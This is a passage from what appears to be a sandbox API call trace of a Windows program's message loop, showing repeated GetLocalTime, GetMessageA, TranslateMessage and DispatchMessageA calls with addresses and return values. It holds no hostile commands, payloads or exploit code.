wSecond=0x28, wMilliseconds=0x62)) [0110.357] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x62)) [0110.357] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.377] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.378] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.378] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x76)) [0110.378] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x77)) [0110.379] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.399] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.399] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.400] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x8d)) [0110.400] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x8d)) [0110.401] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.417] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.417] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.417] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x9e)) [0110.417] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x9e)) [0110.417] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.442] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.442] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.442] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0xb7)) [0110.442] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0xb7)) [0110.442] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.455] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.455] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.455] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0xc4)) [0110.455] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0xc4)) [0110.455] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.465] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.465] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.465] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0xce)) [0110.465] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0xce)) [0110.465] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.486] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.486] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.486] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0xe3)) [0110.487] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0xe4)) [0110.487] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.496] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.496] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.496] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0xed)) [0110.496] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0xed)) [0110.496] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.517] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.517] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.517] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x102)) [0110.517] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x102)) [0110.517] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.526] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.527] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.527] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x10c)) [0110.527] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x10c)) [0110.527] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.544] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.544] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.544] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x11d)) [0110.544] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x11d)) [0110.544] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.571] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.571] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.571] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x138)) [0110.571] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x138)) [0110.571] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.573] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.573] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.573] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x13a)) [0110.573] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x13a)) [0110.573] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.589] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.589] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.589] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x14a)) [0110.589] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x14a)) [0110.589] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.610] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.610] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.610] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x15f)) [0110.610] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x15f)) [0110.610] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.623] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.623] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.623] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x16c)) [0110.623] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x16c)) [0110.623] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.639] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.639] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.639] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x17c)) [0110.639] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x17c)) [0110.639] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.654] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.654] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.654] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x18b)) [0110.654] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x18b)) [0110.654] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.666] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.666] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.666] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x197)) [0110.666] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x197)) [0110.666] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.688] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.688] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.688] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1ad)) [0110.688] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1ad)) [0110.688] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.699] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.699] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.699] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1b8)) [0110.699] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1b8)) [0110.699] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.715] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.715] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.715] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1c8)) [0110.715] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1c8)) [0110.715] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.740] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.740] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.740] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1e1)) [0110.740] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1e1)) [0110.740] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.746] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.746] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.746] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1e7)) [0110.746] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1e7)) [0110.746] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.767] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.767] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.767] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1fc)) [0110.767] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x1fc)) [0110.767] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.777] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.777] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.777] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x206)) [0110.777] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x206)) [0110.777] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.794] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.794] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.794] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x217)) [0110.794] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x217)) [0110.794] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.843] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.843] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.843] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x248)) [0110.843] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x248)) [0110.843] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.888] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.888] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.888] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x275)) [0110.889] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x276)) [0110.889] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.907] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.907] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.907] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x288)) [0110.907] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x288)) [0110.907] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.918] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.918] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.918] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x293)) [0110.918] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x293)) [0110.918] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.936] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.936] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.936] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x2a5)) [0110.936] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x2a5)) [0110.936] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.949] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.949] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.949] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x2b2)) [0110.949] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x2b2)) [0110.949] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0110.969] TranslateMessage (lpMsg=0x2347a14) returned 0 [0110.969] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0110.969] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x2c6)) [0110.969] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x2c6)) [0110.969] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.007] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.007] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.007] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x2ec)) [0111.007] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x2ec)) [0111.007] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.019] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.019] DispatchMessageA (lpMsg=0x2347a14) returned 0x0 [0111.019] GetLocalTime (in: lpSystemTime=0x19f748 | out: lpSystemTime=0x19f748*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x2f8)) [0111.019] GetLocalTime (in: lpSystemTime=0x19f740 | out: lpSystemTime=0x19f740*(wYear=0x7e6, wMonth=0x8, wDayOfWeek=0x5, wDay=0x5, wHour=0xd, wMinute=0x31, wSecond=0x28, wMilliseconds=0x2f8)) [0111.019] GetMessageA (in: lpMsg=0x2347a14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2347a14) returned 1 [0111.030] TranslateMessage (lpMsg=0x2347a14) returned 0 [0111.030] 